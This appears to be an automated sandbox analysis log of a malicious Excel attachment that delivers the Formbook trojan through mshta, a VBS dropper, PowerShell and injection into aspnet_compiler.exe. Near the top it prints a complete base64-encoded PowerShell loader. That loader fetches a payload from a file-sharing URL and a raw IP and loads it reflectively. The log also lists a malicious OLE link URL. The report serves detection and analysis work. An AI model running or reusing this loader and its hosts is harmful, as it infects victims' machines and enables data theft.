Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0042BDA3 NtClose, 16_2_0042BDA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A907AC NtCreateMutant,LdrInitializeThunk, 16_2_00A907AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8F9F0 NtClose,LdrInitializeThunk, 16_2_00A8F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FAE8 NtQueryInformationProcess,LdrInitializeThunk, 16_2_00A8FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FB68 NtFreeVirtualMemory,LdrInitializeThunk, 16_2_00A8FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FDC0 NtQuerySystemInformation,LdrInitializeThunk, 16_2_00A8FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A900C4 NtCreateFile, 16_2_00A900C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A90060 NtQuerySection, 16_2_00A90060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A90078 NtResumeThread, 16_2_00A90078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A90048 NtProtectVirtualMemory, 16_2_00A90048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A901D4 NtSetValueKey, 16_2_00A901D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A9010C NtOpenDirectoryObject, 16_2_00A9010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A90C40 NtGetContextThread, 16_2_00A90C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A910D0 NtOpenProcessToken, 16_2_00A910D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A91148 NtOpenThread, 16_2_00A91148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8F8CC NtWaitForSingleObject, 16_2_00A8F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8F938 NtWriteFile, 16_2_00A8F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A91930 NtSetContextThread, 16_2_00A91930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8F900 NtReadFile, 16_2_00A8F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FAB8 NtQueryValueKey, 16_2_00A8FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FAD0 NtAllocateVirtualMemory, 16_2_00A8FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FA20 NtQueryInformationFile, 16_2_00A8FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FA50 NtEnumerateValueKey, 16_2_00A8FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FBB8 NtQueryInformationToken, 16_2_00A8FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FBE8 NtQueryVirtualMemory, 16_2_00A8FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FB50 NtCreateKey, 16_2_00A8FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FC90 NtUnmapViewOfSection, 16_2_00A8FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FC30 NtOpenProcess, 16_2_00A8FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FC60 NtMapViewOfSection, 16_2_00A8FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FC48 NtSetInformationFile, 16_2_00A8FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FD8C NtDelayExecution, 16_2_00A8FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A91D80 NtSuspendThread, 16_2_00A91D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FD5C NtEnumerateKey, 16_2_00A8FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FEA0 NtReadVirtualMemory, 16_2_00A8FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FED0 NtAdjustPrivilegesToken, 16_2_00A8FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FE24 NtWriteVirtualMemory, 16_2_00A8FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FFB4 NtCreateSection, 16_2_00A8FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FFFC NtCreateProcessEx, 16_2_00A8FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A8FF34 NtQueueApcThread, 16_2_00A8FF34
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE89A7352E 8_2_000007FE89A7352E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00401000 16_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0040F803 16_2_0040F803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_004160B3 16_2_004160B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00401260 16_2_00401260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0040FA23 16_2_0040FA23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00402ADD 16_2_00402ADD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00402AE0 16_2_00402AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0040DAA3 16_2_0040DAA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00402340 16_2_00402340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0042E333 16_2_0042E333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00402334 16_2_00402334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00402E70 16_2_00402E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0040F7FA 16_2_0040F7FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A9E0C6 16_2_00A9E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A9E2E9 16_2_00A9E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B463BF 16_2_00B463BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AC63DB 16_2_00AC63DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AA2305 16_2_00AA2305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AEA37B 16_2_00AEA37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B2443E 16_2_00B2443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B205E3 16_2_00B205E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00ABC5F0 16_2_00ABC5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AE6540 16_2_00AE6540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AA4680 16_2_00AA4680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AAE6C1 16_2_00AAE6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B42622 16_2_00B42622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AEA634 16_2_00AEA634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AAC7BC 16_2_00AAC7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AC286D 16_2_00AC286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AAC85C 16_2_00AAC85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AA29B2 16_2_00AA29B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B4098E 16_2_00B4098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B349F5 16_2_00B349F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AB69FE 16_2_00AB69FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AEC920 16_2_00AEC920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B4CBA4 16_2_00B4CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B26BCB 16_2_00B26BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B42C9C 16_2_00B42C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B2AC5E 16_2_00B2AC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AD0D3B 16_2_00AD0D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AACD5B 16_2_00AACD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AD2E2F 16_2_00AD2E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00ABEE4C 16_2_00ABEE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B3CFB1 16_2_00B3CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B12FDC 16_2_00B12FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AB0F3F 16_2_00AB0F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00ACD005 16_2_00ACD005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B1D06D 16_2_00B1D06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AA3040 16_2_00AA3040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AB905A 16_2_00AB905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B2D13F 16_2_00B2D13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B41238 16_2_00B41238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A9F3CF 16_2_00A9F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AA7353 16_2_00AA7353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AB1489 16_2_00AB1489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AD5485 16_2_00AD5485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00ADD47D 16_2_00ADD47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B435DA 16_2_00B435DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AA351F 16_2_00AA351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B2579A 16_2_00B2579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AD57C3 16_2_00AD57C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B3771D 16_2_00B3771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B3F8EE 16_2_00B3F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B1F8C4 16_2_00B1F8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B25955 16_2_00B25955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B2394B 16_2_00B2394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B53A83 16_2_00B53A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B2DBDA 16_2_00B2DBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A9FBD7 16_2_00A9FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AC7B00 16_2_00AC7B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B3FDDD 16_2_00B3FDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00B2BF14 16_2_00B2BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00ACDF7C 16_2_00ACDF7C
Document contains embedded VBA macros
Source: PI-02911202409#.xla.xlsx OLE indicator, VBA macros: true
Source: 50A30000.0.dr OLE indicator, VBA macros: true
Document embeds suspicious OLE2 link
Source: PI-02911202409#.xla.xlsx Stream path 'MBD006EC261/\x1Ole' : https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoatuwOFU(K=bt38S]WJ%&rywft9V+D%cj[?B@~>ZyPQLgDlY0Sodd9BymSJpBZdRB8usNyyhixhVATOqI1K mf:'cKJ$[;S
Source: 50A30000.0.dr Stream path 'MBD006EC261/\x1Ole' : https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoatuwOFU(K=bt38S]WJ%&rywft9V+D%cj[?B@~>ZyPQLgDlY0Sodd9BymSJpBZdRB8usNyyhixhVATOqI1K mf:'cKJ$[;S
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00B0F970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00A9DF5C appears 137 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00AE3F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00AE373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00A9E2A8 appears 60 times
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Yara signature match
Source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winXLSX@16/25@7/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PI-02911202409#.xla.xlsx Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR8D6F.tmp Jump to behavior
Source: PI-02911202409#.xla.xlsx OLE indicator, Workbook stream: true
Source: 50A30000.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................P................m.......m.....}..w..............D.......D......1D.....(.P.......D......3D.......................~............. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm.......................:.l....}..w......~.....\.F.......D.............(.P.....................x............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..........................................~.....}..w.............:M......:.l......L.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm.......................:.l....}..w......~.....\.F.......D.............(.P.....................x............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..........................................~.....}..w.............:M......:.l......L.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..:M......:.l......L.....(.P............................. ....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..........................................~.....}..w.............:M......:.l......L.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..........................................~.....}..w.............:M......:.l......L.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..........................................~.....}..w.............:M......:.l......L.....(.P.............................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .........~.....}..w.............:M......:.l......L.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..................~.............0........Wl.....}..w....x.......@EE.....^...............(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..................~......................Wl.....}..w....x.......@EE.....^...............(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................P..............T.r.u.e...m.....P7................D.....P7......X7................D......3D.....8...............P7.............. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................h(D.......................m.....}..w......m.......D.......D......1D.....(.P.....................8............................... Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: PI-02911202409#.xla.xlsx Virustotal: Detection: 9%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
